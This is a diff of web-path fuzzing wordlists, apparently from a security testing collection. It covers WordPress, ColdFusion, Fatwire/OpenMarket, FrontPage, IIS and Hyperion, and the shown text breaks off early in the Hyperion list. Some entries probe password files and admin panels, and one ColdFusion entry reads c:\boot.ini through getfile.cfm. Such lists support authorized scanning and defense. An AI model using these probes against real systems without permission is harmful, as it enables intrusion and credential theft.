+wp-includes/js/tinymce/themes/advanced/css
+wp-includes/js/tinymce/themes/advanced/editor_template.js
+wp-includes/js/tinymce/themes/advanced/image.htm
+wp-includes/js/tinymce/themes/advanced/images
+wp-includes/js/tinymce/themes/advanced/img
+wp-includes/js/tinymce/themes/advanced/js
+wp-includes/js/tinymce/themes/advanced/jscripts
+wp-includes/js/tinymce/themes/advanced/langs
+wp-includes/js/tinymce/themes/advanced/link.htm
+wp-includes/js/tinymce/themes/advanced/skins
+wp-includes/js/tinymce/themes/advanced/source_editor.htm
+wp-includes/js/tinymce/tiny_mce_config.php
+wp-includes/js/tinymce/tiny_mce_gzip.php
+wp-includes/js/tinymce/tiny_mce.js
+wp-includes/js/tinymce/tiny_mce_popup.js
+wp-includes/js/tinymce/utils/
+wp-includes/js/tinymce/utils/editable_selects.js
+wp-includes/js/tinymce/utils/form_utils.js
+wp-includes/js/tinymce/utils/mclayer.js
+wp-includes/js/tinymce/utils/mctabs.js
+wp-includes/js/tinymce/utils/validate.js
+wp-includes/js/tinymce/wp-mce-help.php
+wp-includes/js/tinymce/wp-tinymce.js.gz
+wp-includes/js/tinymce/wp-tinymce.php
+wp-includes/js/tw-sack.dev.js
+wp-includes/js/tw-sack.js
+wp-includes/js/wp-ajax.js
+wp-includes/js/wp-ajax-response.dev.js
+wp-includes/js/wp-ajax-response.js
+wp-includes/js/wp-list-revisions.dev.js
+wp-includes/js/wp-list-revisions.js
+wp-includes/js/wp-lists.dev.js
+wp-includes/js/wp-lists.js
+wp-includes/kses.php
+wp-includes/l10n.php
+wp-includes/link-template.php
+wp-includes/load.php
+wp-includes/locale.php
+wp-includes/media.php
+wp-includes/meta.php
+wp-includes/ms-blogs.php
+wp-includes/ms-default-constants.php
+wp-includes/ms-default-filters.php
+wp-includes/ms-deprecated.php
+wp-includes/ms-files.php
+wp-includes/ms-functions.php
+wp-includes/ms-load.php
+wp-includes/ms-settings.php
+wp-includes/nav-menu.php
+wp-includes/nav-menu-template.php
+wp-includes/pluggable-deprecated.php
+wp-includes/pluggable.php
+wp-includes/plugin.php
+wp-includes/pomo/
+wp-includes/pomo/entry.php
+wp-includes/pomo/mo.php
+wp-includes/pomo/po.php
+wp-includes/pomo/streams.php
+wp-includes/pomo/translations.php
+wp-includes/post.php
+wp-includes/post-template.php
+wp-includes/post-thumbnail-template.php
+wp-includes/query.php
+wp-includes/registration-functions.php
+wp-includes/registration.php
+wp-includes/rewrite.php
+wp-includes/rss-functions.php
+wp-includes/rss.php
+wp-includes/script-loader.php
+wp-includes/shortcodes.php
+wp-includes/streams.php
+wp-includes/taxonomy.php
+wp-includes/template-loader.php
+wp-includes/Text/
+wp-includes/Text/Diff/
+wp-includes/Text/Diff/Engine/
+wp-includes/Text/Diff/Engine/native.php
+wp-includes/Text/Diff/Engine/shell.php
+wp-includes/Text/Diff/Engine/string.php
+wp-includes/Text/Diff/Engine/xdiff.php
+wp-includes/Text/Diff.php
+wp-includes/Text/Diff/Renderer/
+wp-includes/Text/Diff/Renderer/inline.php
+wp-includes/Text/Diff/Renderer.php
+wp-includes/theme-compat/
+wp-includes/theme-compat/comments.php
+wp-includes/theme-compat/comments-popup.php
+wp-includes/theme-compat/footer.php
+wp-includes/theme-compat/header.php
+wp-includes/theme-compat/sidebar.php
+wp-includes/theme.php
+wp-includes/update.php
+wp-includes/user.php
+wp-includes/vars.php
+wp-includes/version.php
+wp-includes/widgets.php
+wp-includes/wlwmanifest.xml
+wp-includes/wp-db.php
+wp-includes/wp-diff.php
+wp-links-opml.php
+wp-load.php
+wp-login.php
+wp-mail.php
+wp-pass.php
+wp-rdf.php
+wp-register.php
+wp-rss2.php
+wp-rss.php
+wp-settings.php
+wp-signup.php
+wp-trackback.php
+xmlrpc.php

Discovery/ColdFusion.fuzz.txt

@@ -0,0 +1,111 @@
+/CFIDE/Administrator/
+/CFIDE/Administrator/Application.cfm
+/CFIDE/Administrator/index.cfm
+/CFIDE/administrator/aboutcf.cfm
+/CFIDE/Administrator/checkfile.cfm
+/CFIDE/Administrator/enter.cfm
+/CFIDE/Administrator/header.cfm
+/CFIDE/Administrator/homefile.cfm
+/CFIDE/Administrator/homepage.cfm
+/CFIDE/Administrator/login.cfm
+/CFIDE/Administrator/logout.cfm
+/CFIDE/Administrator/navserver.cfm
+/CFIDE/Administrator/right.cfm
+/CFIDE/Administrator/tabs.cfm
+/CFIDE/Administrator/welcome.cfm
+/CFIDE/Administrator/welcomedoc.cfm
+/CFIDE/Administrator/welcomeexapps.cfm
+/CFIDE/Administrator/welcomefooter.cfm
+/CFIDE/Administrator/welcomegetstart.cfm
+/CFIDE/Application.cfm
+/CFIDE/adminapi/
+/CFIDE/adminapi/Application.cfm
+/CFIDE/adminapi/_datasource/
+/CFIDE/adminapi/_datasource/formatjdbcurl.cfm
+/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm
+/CFIDE/adminapi/_datasource/geturldefaults.cfm
+/CFIDE/adminapi/_datasource/setdsn.cfm
+/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm
+/CFIDE/adminapi/_datasource/setsldatasource.cfm
+/CFIDE/adminapi/administrator.cfc
+/CFIDE/adminapi/base.cfc
+/CFIDE/adminapi/customtags/
+/CFIDE/adminapi/customtags/l10n.cfm
+/CFIDE/adminapi/customtags/resources
+/CFIDE/adminapi/customtags/resources/
+/CFIDE/adminapi/datasource.cfc
+/CFIDE/adminapi/debugging.cfc
+/CFIDE/adminapi/eventgateway.cfc
+/CFIDE/adminapi/extensions.cfc
+/CFIDE/adminapi/mail.cfc
+/CFIDE/adminapi/runtime.cfc
+/CFIDE/adminapi/security.cfc
+/CFIDE/classes/
+/CFIDE/classes/cf-j2re-win.cab
+/CFIDE/classes/cfapplets.jar
+/CFIDE/classes/images
+/CFIDE/componentutils/
+/CFIDE/componentutils/Application.cfm
+/CFIDE/componentutils/_component_cfcToHTML.cfm
+/CFIDE/componentutils/_component_cfcToMCDL.cfm?
+/CFIDE/componentutils/_component_style.cfm
+/CFIDE/componentutils/_component_utils.cfm
+/CFIDE/componentutils/cfcexplorer.cfc
+/CFIDE/componentutils/cfcexplorer_utils.cfm
+/CFIDE/componentutils/componentdetail.cfm
+/CFIDE/componentutils/componentdoc.cfm
+/CFIDE/componentutils/componentlist.cfm
+/CFIDE/componentutils/gatewaymenu
+/CFIDE/componentutils/gatewaymenu/
+/CFIDE/componentutils/gatewaymenu/menu.cfc
+/CFIDE/componentutils/gatewaymenu/menunode.cfc
+/CFIDE/componentutils/login.cfm
+/CFIDE/componentutils/packagelist.cfm
+/CFIDE/componentutils/utils.cfc
+/CFIDE/debug/
+/CFIDE/debug/images/
+/CFIDE/debug/includes/
+/CFIDE/images/
+/CFIDE/images/skins/
+/CFIDE/install.cfm
+/CFIDE/installers/
+/CFIDE/installers/CFMX7DreamWeaverExtensions.mxp
+/CFIDE/installers/CFReportBuilderInstaller.exe
+/CFIDE/probe.cfm
+/CFIDE/scripts/
+/CFIDE/scripts/css/
+/CFIDE/scripts/xsl/
+/CFIDE/wizards/
+/CFIDE/wizards/common/
+/CFIDE/wizards/common/utils.cfc
+/cfappman/index.cfm
+/cfdocs/MOLE.CFM
+/cfdocs/TOXIC.CFM
+/cfdocs/cfmlsyntaxcheck.cfm
+/cfdocs/exampleapp/docs/sourcewindow.cfm
+/cfdocs/exampleapp/email/application.cfm
+/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini
+/cfdocs/exampleapp/publish/admin/addcontent.cfm
+/cfdocs/exampleapp/publish/admin/application.cfm
+/cfdocs/examples/cvbeans/beaninfo.cfm
+/cfdocs/examples/parks/detail.cfm
+/cfdocs/expeval/displayopenedfile.cfm
+/cfdocs/expeval/eval.cfm
+/cfdocs/expeval/exprcalc.cfm
+/cfdocs/expeval/openfile.cfm
+/cfdocs/expeval/sendmail.cfm
+/cfdocs/expressions.cfm
+/cfdocs/root.cfm
+/cfdocs/snippets/evaluate.cfm
+/cfdocs/snippets/fileexists.cfm
+/cfdocs/snippets/gettempdirectory.cfm
+/cfdocs/snippets/viewexample.cfm
+/cfdocs/zero.cfm
+/cfusion/cfapps/forums/data/forums.mdb
+/cfusion/cfapps/forums/forums_.mdb
+/cfusion/cfapps/security/data/realm.mdb
+/cfusion/cfapps/security/realm_.mdb
+/cfusion/database/cfexamples.mdb
+/cfusion/database/cfsnippets.mdb
+/cfusion/database/cypress.mdb
+/cfusion/database/smpolicy.mdb

Discovery/FatwireCMS.fuzz.txt

@@ -0,0 +1,390 @@
+/Fatwire/benchdatabase
+/Fatwire/benchelement
+/Fatwire/benchtop
+/Fatwire/benchwebpage
+/FutureTense/Apps/AdminForms/AdminForm
+/FutureTense/Apps/AdminForms/AdminFrame
+/FutureTense/Apps/AdminForms/AdminMenu
+/FutureTense/Apps/AdminForms/AdminTitle
+/FutureTense/Apps/Xcelerate/Render
+/Hello
+/OpenMarket/AssetMaker/CreateAssetFront
+/OpenMarket/AssetMaker/CreateAssetPost
+/OpenMarket/AssetMaker/DeleteAsset
+/OpenMarket/AssetMaker/FramedLoginPost
+/OpenMarket/AssetMaker/LoginPage
+/OpenMarket/AssetMaker/LogoutFront
+/OpenMarket/AssetMaker/ProcessLoginRequest
+/OpenMarket/AssetMaker/ShowDescriptionPost
+/OpenMarket/AssetMaker/ShowDescriptor
+/OpenMarket/AssetMaker/ShowGeneralFunctions
+/OpenMarket/AssetMaker/ShowToolbar
+/OpenMarket/AssetMaker/ShowTree
+/OpenMarket/AssetMaker/ShowTreeFunctions
+/OpenMarket/AssetMaker/ShowWorkFrames
+/OpenMarket/AssetMaker/ShowWorkList
+/OpenMarket/CommerceData/Installation/DeleteCommerceData
+/OpenMarket/Gator/UIFramework/LoadAdminTree
+/OpenMarket/Gator/UIFramework/LoadGlobalPopup
+/OpenMarket/Gator/UIFramework/LoadTab
+/OpenMarket/Gator/UIFramework/TreeInstallIE
+/OpenMarket/Gator/UIFramework/TreeInstallNetscape
+/OpenMarket/Gator/UIFramework/TreeLoadNetscape
+/OpenMarket/Gator/UIFramework/TreeOpURL
+/OpenMarket/Gator/UIFramework/TreeTabManager
+/OpenMarket/Samples/NewPortal/Export
+/OpenMarket/Samples/NewPortal/Export/demo
+/OpenMarket/Samples/NewPortal/Export/main
+/OpenMarket/Samples/NewPortal/JSP
+/OpenMarket/Samples/NewPortal/JSP/AdBrick
+/OpenMarket/Samples/NewPortal/JSP/ArticleBrick
+/OpenMarket/Samples/NewPortal/JSP/CompanyLogoBrick
+/OpenMarket/Samples/NewPortal/JSP/FooterBrick
+/OpenMarket/Samples/NewPortal/JSP/Greeting
+/OpenMarket/Samples/NewPortal/JSP/ImagesBrick
+/OpenMarket/Samples/NewPortal/JSP/main
+/OpenMarket/Samples/NewPortal/JSP/mainheadlines
+/OpenMarket/Samples/NewPortal/JSP/NavBrick
+/OpenMarket/Samples/NewPortal/JSP/NewsBrick1
+/OpenMarket/Samples/NewPortal/JSP/NewsBrick2
+/OpenMarket/Samples/NewPortal/JSP/NewsBrick3
+/OpenMarket/Samples/NewPortal/JSP/NewsBrick4
+/OpenMarket/Samples/NewPortal/main
+/OpenMarket/Samples/NewPortal/XML
+/OpenMarket/Samples/NewPortal/XML/AdBrick
+/OpenMarket/Samples/NewPortal/XML/ArticleBrick
+/OpenMarket/Samples/NewPortal/XML/CompanyLogoBrick
+/OpenMarket/Samples/NewPortal/XML/FooterBrick
+/OpenMarket/Samples/NewPortal/XML/Greeting
+/OpenMarket/Samples/NewPortal/XML/ImagesBrick
+/OpenMarket/Samples/NewPortal/XML/main
+/OpenMarket/Samples/NewPortal/XML/mainheadlines
+/OpenMarket/Samples/NewPortal/XML/mainVariables.mode
+/OpenMarket/Samples/NewPortal/XML/NavBrick
+/OpenMarket/Samples/NewPortal/XML/NewsBrick1
+/OpenMarket/Samples/NewPortal/XML/NewsBrick2
+/OpenMarket/Samples/NewPortal/XML/NewsBrick3
+/OpenMarket/Samples/NewPortal/XML/NewsBrick4
+/OpenMarket/Samples/Portal/main
+/OpenMarket/Xcelerate/Actions/AbstainFromVotingFront
+/OpenMarket/Xcelerate/Actions/AbstainFromVotingPost
+/OpenMarket/Xcelerate/Actions/AddToActiveListPost
+/OpenMarket/Xcelerate/Actions/AddToGroupFront
+/OpenMarket/Xcelerate/Actions/AddToGroupPost
+/OpenMarket/Xcelerate/Actions/ALPopupFront
+/OpenMarket/Xcelerate/Actions/ApprovalStatusFront
+/OpenMarket/Xcelerate/Actions/ApprovalStatusPost
+/OpenMarket/Xcelerate/Actions/ApproveFront
+/OpenMarket/Xcelerate/Actions/ApprovePost
+/OpenMarket/Xcelerate/Actions/AssignFront
+/OpenMarket/Xcelerate/Actions/AssignHistoryFront
+/OpenMarket/Xcelerate/Actions/AssignPost
+/OpenMarket/Xcelerate/Actions/BatchPublish
+/OpenMarket/Xcelerate/Actions/BrowseAssetChildren
+/OpenMarket/Xcelerate/Actions/BrowseSiteFront
+/OpenMarket/Xcelerate/Actions/BuildCollectionFront
+/OpenMarket/Xcelerate/Actions/BuildCollectionPost
+/OpenMarket/Xcelerate/Actions/ClearAssignmentFront
+/OpenMarket/Xcelerate/Actions/ClearAssignmentPost
+/OpenMarket/Xcelerate/Actions/ClearFromFolderFront
+/OpenMarket/Xcelerate/Actions/ClearFromFolderPost
+/OpenMarket/Xcelerate/Actions/ClearTasksPost
+/OpenMarket/Xcelerate/Actions/CommitFront
+/OpenMarket/Xcelerate/Actions/CommitPost
+/OpenMarket/Xcelerate/Actions/ContentDetailsFront
+/OpenMarket/Xcelerate/Actions/CopyFront
+/OpenMarket/Xcelerate/Actions/CreateWorkflowGroupFront
+/OpenMarket/Xcelerate/Actions/DelegateAssignmentFront
+/OpenMarket/Xcelerate/Actions/DelegateAssignmentPost
+/OpenMarket/Xcelerate/Actions/DeleteFront
+/OpenMarket/Xcelerate/Actions/DeleteGroupFront
+/OpenMarket/Xcelerate/Actions/DeleteGroupPost
+/OpenMarket/Xcelerate/Actions/DeletePost
+/OpenMarket/Xcelerate/Actions/DeletessFront
+/OpenMarket/Xcelerate/Actions/DeletewfReportFront
+/OpenMarket/Xcelerate/Actions/EditFront
+/OpenMarket/Xcelerate/Actions/EditPost
+/OpenMarket/Xcelerate/Actions/EditSearchFront
+/OpenMarket/Xcelerate/Actions/EditwfReportFront
+/OpenMarket/Xcelerate/Actions/EditWorkflowGroupFront
+/OpenMarket/Xcelerate/Actions/EditWorkflowGroupPost
+/OpenMarket/Xcelerate/Actions/EventPublish
+/OpenMarket/Xcelerate/Actions/HistoryFront
+/OpenMarket/Xcelerate/Actions/LockFront
+/OpenMarket/Xcelerate/Actions/LogoutFront
+/OpenMarket/Xcelerate/Actions/NewContentFront
+/OpenMarket/Xcelerate/Actions/NewContentPost
+/OpenMarket/Xcelerate/Actions/PendingAssignments
+/OpenMarket/Xcelerate/Actions/PlacePageFront
+/OpenMarket/Xcelerate/Actions/PlacePagePost
+/OpenMarket/Xcelerate/Actions/PreviewWithTemplates
+/OpenMarket/Xcelerate/Actions/PublishConsoleFront
+/OpenMarket/Xcelerate/Actions/PublishConsolePost
+/OpenMarket/Xcelerate/Actions/PublishFront
+/OpenMarket/Xcelerate/Actions/PublishPointsFront
+/OpenMarket/Xcelerate/Actions/PublishPost
+/OpenMarket/Xcelerate/Actions/RemoteContentPost
+/OpenMarket/Xcelerate/Actions/RemoveFromGroupFront
+/OpenMarket/Xcelerate/Actions/RemoveFromGroupPost
+/OpenMarket/Xcelerate/Actions/RemoveFromWorkflowFront
+/OpenMarket/Xcelerate/Actions/RemoveFromWorkflowPost
+/OpenMarket/Xcelerate/Actions/RemovePubSessionFront
+/OpenMarket/Xcelerate/Actions/RemovePubSessionPost
+/OpenMarket/Xcelerate/Actions/RollbackFront
+/OpenMarket/Xcelerate/Actions/RollbackPost
+/OpenMarket/Xcelerate/Actions/SaveSearch
+/OpenMarket/Xcelerate/Actions/SavewfReport
+/OpenMarket/Xcelerate/Actions/SearchAdmin
+/OpenMarket/Xcelerate/Actions/SearchFront
+/OpenMarket/Xcelerate/Actions/SearchPost
+/OpenMarket/Xcelerate/Actions/Security/GetACL
+/OpenMarket/Xcelerate/Actions/Security/LDAPAccessUserPublication
+/OpenMarket/Xcelerate/Actions/Security/ProcessLoginRequest
+/OpenMarket/Xcelerate/Actions/Security/SelectPublication
+/OpenMarket/Xcelerate/Actions/Security/SetPublicationName
+/OpenMarket/Xcelerate/Actions/SendEmailFront
+/OpenMarket/Xcelerate/Actions/SendEmailPost
+/OpenMarket/Xcelerate/Actions/SetAssetExportDataFront
+/OpenMarket/Xcelerate/Actions/SetAssetExportDataPost
+/OpenMarket/Xcelerate/Actions/SetGroupParticipants
+/OpenMarket/Xcelerate/Actions/SetStatusFront
+/OpenMarket/Xcelerate/Actions/SetStatusPost
+/OpenMarket/Xcelerate/Actions/SetWorkflowFront
+/OpenMarket/Xcelerate/Actions/SetWorkflowParticipantsFront
+/OpenMarket/Xcelerate/Actions/SetWorkflowParticipantsPost
+/OpenMarket/Xcelerate/Actions/SetWorkflowPost
+/OpenMarket/Xcelerate/Actions/ShareAssetFront
+/OpenMarket/Xcelerate/Actions/ShareAssetPost
+/OpenMarket/Xcelerate/Actions/ShowAssignFront
+/OpenMarket/Xcelerate/Actions/ShowBlockingAssetsFront
+/OpenMarket/Xcelerate/Actions/ShowCheckoutsFront
+/OpenMarket/Xcelerate/Actions/ShowFoldersFront
+/OpenMarket/Xcelerate/Actions/ShowHeldAssetsFront
+/OpenMarket/Xcelerate/Actions/ShowMyActiveListFront
+/OpenMarket/Xcelerate/Actions/ShowMyDesktopFront
+/OpenMarket/Xcelerate/Actions/ShowPublishableAssetsFront
+/OpenMarket/Xcelerate/Actions/ShowPublishOutputFront
+/OpenMarket/Xcelerate/Actions/ShowRecentFront
+/OpenMarket/Xcelerate/Actions/ShowSearches
+/OpenMarket/Xcelerate/Actions/ShowStartMenuItems
+/OpenMarket/Xcelerate/Actions/ShowWorkflowFront
+/OpenMarket/Xcelerate/Actions/ShowWorkflowParticipantsFront
+/OpenMarket/Xcelerate/Actions/ShowWorkListFront
+/OpenMarket/Xcelerate/Actions/SimpleSearchFront
+/OpenMarket/Xcelerate/Actions/StatusDetailsFront
+/OpenMarket/Xcelerate/Actions/UnlockFront
+/OpenMarket/Xcelerate/Actions/UpdateFront
+/OpenMarket/Xcelerate/Actions/UpdatePost
+/OpenMarket/Xcelerate/Actions/Util/ShowError
+/OpenMarket/Xcelerate/Actions/wfReportAdmin
+/OpenMarket/Xcelerate/Actions/Workflow/ActionTaken
+/OpenMarket/Xcelerate/Actions/Workflow/ActionToTake
+/OpenMarket/Xcelerate/Actions/WorkflowGroupDetailsFront
+/OpenMarket/Xcelerate/Actions/WorkflowReportFront
+/OpenMarket/Xcelerate/Actions/WorkflowReportPost
+/OpenMarket/Xcelerate/Admin/AssetSubtypeFront
+/OpenMarket/Xcelerate/Admin/AssetSubtypePost
+/OpenMarket/Xcelerate/Admin/AssetTypeClientConfigFront
+/OpenMarket/Xcelerate/Admin/AssetTypeClientConfigPost
+/OpenMarket/Xcelerate/Admin/AssetTypeClientFront
+/OpenMarket/Xcelerate/Admin/AssetTypeClientPost
+/OpenMarket/Xcelerate/Admin/AssetTypeFront
+/OpenMarket/Xcelerate/Admin/AssetTypePost
+/OpenMarket/Xcelerate/Admin/AssetTypePubFront
+/OpenMarket/Xcelerate/Admin/AssetTypePubPost
+/OpenMarket/Xcelerate/Admin/AssociationFront
+/OpenMarket/Xcelerate/Admin/AssociationPost
+/OpenMarket/Xcelerate/Admin/CategoryFront
+/OpenMarket/Xcelerate/Admin/CategoryPost
+/OpenMarket/Xcelerate/Admin/ContentCategoryFront
+/OpenMarket/Xcelerate/Admin/ContentCategoryPost
+/OpenMarket/Xcelerate/Admin/DelegateAssignmentFront
+/OpenMarket/Xcelerate/Admin/DelegateAssignmentPost
+/OpenMarket/Xcelerate/Admin/FolderFront
+/OpenMarket/Xcelerate/Admin/FolderPost
+/OpenMarket/Xcelerate/Admin/FramedLoginPost
+/OpenMarket/Xcelerate/Admin/FunctionPrivs/Front
+/OpenMarket/Xcelerate/Admin/FunctionPrivs/List
+/OpenMarket/Xcelerate/Admin/FunctionPrivs/Post
+/OpenMarket/Xcelerate/Admin/IndexQueryFront
+/OpenMarket/Xcelerate/Admin/IndexQueryPost
+/OpenMarket/Xcelerate/Admin/InstallClass
+/OpenMarket/Xcelerate/Admin/LoginPage
+/OpenMarket/Xcelerate/Admin/LogoutFront
+/OpenMarket/Xcelerate/Admin/Monitor/ShowAdminWorkList
+/OpenMarket/Xcelerate/Admin/NewSiteTreeUpdate
+/OpenMarket/Xcelerate/Admin/ProcessLoginRequest
+/OpenMarket/Xcelerate/Admin/Publish/AssetDefaultTemplateFront
+/OpenMarket/Xcelerate/Admin/Publish/AssetDefaultTemplatePost
+/OpenMarket/Xcelerate/Admin/Publish/BulkApproveFront
+/OpenMarket/Xcelerate/Admin/Publish/BulkApprovePost
+/OpenMarket/Xcelerate/Admin/Publish/DelivTypeEdit
+/OpenMarket/Xcelerate/Admin/Publish/DelivTypePost
+/OpenMarket/Xcelerate/Admin/Publish/DestEdit
+/OpenMarket/Xcelerate/Admin/Publish/DestPost
+/OpenMarket/Xcelerate/Admin/Publish/HistoryMgtEdit
+/OpenMarket/Xcelerate/Admin/Publish/HistoryMgtPost
+/OpenMarket/Xcelerate/Admin/Publish/PublishEventEdit
+/OpenMarket/Xcelerate/Admin/Publish/PublishEventPost
+/OpenMarket/Xcelerate/Admin/Publish/TargetSiteEdit
+/OpenMarket/Xcelerate/Admin/Publish/TargetSitePost
+/OpenMarket/Xcelerate/Admin/RevTracking
+/OpenMarket/Xcelerate/Admin/RolesAdminFront
+/OpenMarket/Xcelerate/Admin/RolesAdminPost
+/OpenMarket/Xcelerate/Admin/Search/Disable
+/OpenMarket/Xcelerate/Admin/Search/DisablePost
+/OpenMarket/Xcelerate/Admin/Search/Enable
+/OpenMarket/Xcelerate/Admin/Search/EnablePost
+/OpenMarket/Xcelerate/Admin/Search/List
+/OpenMarket/Xcelerate/Admin/Search/ListLive
+/OpenMarket/Xcelerate/Admin/Search/Resync
+/OpenMarket/Xcelerate/Admin/Search/ResyncPost
+/OpenMarket/Xcelerate/Admin/Search/Status
+/OpenMarket/Xcelerate/Admin/Search/StatusLive
+/OpenMarket/Xcelerate/Admin/SectionFront
+/OpenMarket/Xcelerate/Admin/SectionPost
+/OpenMarket/Xcelerate/Admin/ShowBannerGuts
+/OpenMarket/Xcelerate/Admin/ShowGeneralFunctions
+/OpenMarket/Xcelerate/Admin/ShowToolbar
+/OpenMarket/Xcelerate/Admin/ShowTree
+/OpenMarket/Xcelerate/Admin/ShowTreeFunction
+/OpenMarket/Xcelerate/Admin/ShowTreeFunctions
+/OpenMarket/Xcelerate/Admin/ShowWorkFrames
+/OpenMarket/Xcelerate/Admin/ShowWorkList
+/OpenMarket/Xcelerate/Admin/Site
+/OpenMarket/Xcelerate/Admin/SiteFront
+/OpenMarket/Xcelerate/Admin/SitePost
+/OpenMarket/Xcelerate/Admin/SourceFront
+/OpenMarket/Xcelerate/Admin/SourcePost
+/OpenMarket/Xcelerate/Admin/StartMenuFront
+/OpenMarket/Xcelerate/Admin/StartMenuPost
+/OpenMarket/Xcelerate/Admin/User/ACLList
+/OpenMarket/Xcelerate/Admin/User/Front
+/OpenMarket/Xcelerate/Admin/User/LDGroupList
+/OpenMarket/Xcelerate/Admin/User/LDGroupPost
+/OpenMarket/Xcelerate/Admin/User/LDList
+/OpenMarket/Xcelerate/Admin/User/LDPost
+/OpenMarket/Xcelerate/Admin/User/List
+/OpenMarket/Xcelerate/Admin/User/Modify
+/OpenMarket/Xcelerate/Admin/User/Post
+/OpenMarket/Xcelerate/Admin/UserProfileFront
+/OpenMarket/Xcelerate/Admin/UserProfilePost
+/OpenMarket/Xcelerate/Admin/User/Show
+/OpenMarket/Xcelerate/Admin/User/ShowSingle
+/OpenMarket/Xcelerate/Admin/WorkflowActionsFront
+/OpenMarket/Xcelerate/Admin/WorkflowActionsPost
+/OpenMarket/Xcelerate/Admin/WorkflowFront
+/OpenMarket/Xcelerate/Admin/WorkflowFunctionFront
+/OpenMarket/Xcelerate/Admin/WorkflowFunctionPost
+/OpenMarket/Xcelerate/Admin/WorkflowFunctionPrivsFront
+/OpenMarket/Xcelerate/Admin/WorkflowFunctionPrivsPost
+/OpenMarket/Xcelerate/Admin/WorkflowGraphFront
+/OpenMarket/Xcelerate/Admin/WorkflowPost
+/OpenMarket/Xcelerate/Admin/Workflow/RoleAddFront
+/OpenMarket/Xcelerate/Admin/Workflow/RoleAddPost
+/OpenMarket/Xcelerate/Admin/Workflow/RoleDeleteFront
+/OpenMarket/Xcelerate/Admin/Workflow/RoleDeletePost
+/OpenMarket/Xcelerate/Admin/WorkflowRoutesFront
+/OpenMarket/Xcelerate/Admin/WorkflowRoutesPost
+/OpenMarket/Xcelerate/Admin/WorkflowStatusCodeFront
+/OpenMarket/Xcelerate/Admin/WorkflowStatusCodePost
+/OpenMarket/Xcelerate/Admin/Workflow/SubjectEdit
+/OpenMarket/Xcelerate/Admin/Workflow/SubjectEditPost
+/OpenMarket/Xcelerate/Admin/WorkflowSubjectFront
+/OpenMarket/Xcelerate/Admin/WorkflowSubjectPost
+/OpenMarket/Xcelerate/Admin/WorkflowTimedAction
+/OpenMarket/Xcelerate/Admin/WorkflowTimedActionEventFront
+/OpenMarket/Xcelerate/Admin/WorkflowTimedActionEventPost
+/OpenMarket/Xcelerate/ControlPanel/ControlPanel
+/OpenMarket/Xcelerate/ControlPanel/SearchResults
+/OpenMarket/Xcelerate/Export
+/OpenMarket/Xcelerate/Preview
+/OpenMarket/Xcelerate/PreviewPage
+/OpenMarket/Xcelerate/PrologActions/LoginPost
+/OpenMarket/Xcelerate/PrologActions/Publish/Mirror1/RemoteCall
+/OpenMarket/Xcelerate/PrologActions/Publish/SessionStatus
+/OpenMarket/Xcelerate/Render
+/OpenMarket/Xcelerate/ShowPage
+/OpenMarket/Xcelerate/UIFramework/ApplicationPage
+/OpenMarket/Xcelerate/UIFramework/BlankPreview
+/OpenMarket/Xcelerate/UIFramework/LoginConfirm
+/OpenMarket/Xcelerate/UIFrameWork/LoginConfirm
+/OpenMarket/Xcelerate/UIFramework/LoginError
+/OpenMarket/Xcelerate/UIFramework/LoginPage
+/OpenMarket/Xcelerate/UIFramework/LoginPost
+/OpenMarket/Xcelerate/UIFramework/ShowAppToolbar
+/OpenMarket/Xcelerate/UIFramework/ShowBanner
+/OpenMarket/Xcelerate/UIFramework/ShowMainFrames
+/OpenMarket/Xcelerate/UIFramework/ShowMenubar
+/OpenMarket/Xcelerate/UIFramework/ShowPreviewFrames
+/OpenMarket/Xcelerate/UIFramework/ShowSiteTree
+/OpenMarket/Xcelerate/UIFramework/ShowToolbar
+/OpenMarket/Xcelerate/UIFramework/ShowTree
+/OpenMarket/Xcelerate/UIFramework/ShowTreeChildren
+/OpenMarket/Xcelerate/UIFramework/ShowWorkFrames
+/OpenMarket/Xcelerate/UIFramework/Util/ActionBar
+/OpenMarket/Xcelerate/Ventanas/AltaDatosFiestrero
+/OpenMarket/Xcelerate/View
+/PowerTools/LD/authform
+/PowerTools/LD/authresult
+/PowerTools/LD/getuid
+/PowerTools/LD/LDAPGetGroups
+/PowerTools/LD/LDAPLogin
+/PowerTools/LD/searchform
+/PowerTools/LD/searchresult
+/PowerTools/Reporter/AdminReport
+/PowerTools/Reporter/AssetReport
+/PowerTools/Reporter/CreateTable
+/PowerTools/Reporter/DeleteTable
+/PowerTools/Reporter/Record
+/State
+/Admin
+/adminforms
+/adminforms.html
+/assetmaker
+/BlobServer
+/CacheServer
+/CatalogManager
+/contentserver
+/ContentServer
+/CookieServer
+/DebugServer
+/DispatchManager
+/divine
+/EvalServer
+/fatwire
+/FlushServer
+/futuretense
+/futuretense_cs
+/futuretense_cs/adminforms.html
+/HelloCS
+/Inventory
+/LoginPage
+/LoginPage.html
+/openmarket
+/PageDispatchServer
+/Satellite
+/SeedDispatchServer
+/servlet
+/servlet/BlobServer
+/servlet/CacheServer
+/servlet/CatalogManager
+/servlet/ContentServer
+/servlet/CookieServer
+/servlet/DebugServer
+/servlet/DispatchManager
+/servlet/EvalServer
+/servlet/FlushServer
+/servlet/HelloCS
+/servlet/Inventory
+/servlet/PageDispatchServer
+/servlet/Satellite
+/servlet/SeedDispatchServer
+/servlet/SyncSeedDispatchServer
+/servlet/TreeManager
+/SyncSeedDispatchServer
+/TreeManager
+/xcelerate
+/Xcelerate
+/Xcelerate/Admin/LoginPage.html
+/Xcelerate/LoginPage.html

Discovery/Frontpage.fuzz.txt

@@ -0,0 +1,35 @@
+/admin.dll
+/admin.exe
+/administrators.pwd
+/author.dll
+/author.exe
+/author.log
+/authors.pwd
+/cgi-bin
+/default.htm
+/_fpclass
+/frontpg.ini
+/.htaccess
+/iisadmin
+/isadmin
+/logo.gif
+/_private
+/queryhit.htm
+/QUERYHIT.HTM
+/samples
+/search
+/Search
+/service.grp
+/service.pwd
+/shtml.exe
+/srchadm
+/users.pwd
+/_vti_adm
+/_vti_aut
+/_vti_bin
+/_vti_cnf
+/_vti_inf.html
+/vti_inf.html
+/_vti_log
+/_vti_pvt
+/_vti_txt

Discovery/HTTP_POST_Microsoft.fuzz.txt

@@ -0,0 +1,2 @@
+# Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb
+/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName

Discovery/Hyperion.fuzz.txt

@@ -0,0 +1,578 @@
+/HFM/
+/HFM/Administration
+/HFM/Administration/ManageServersAndApplications.asp
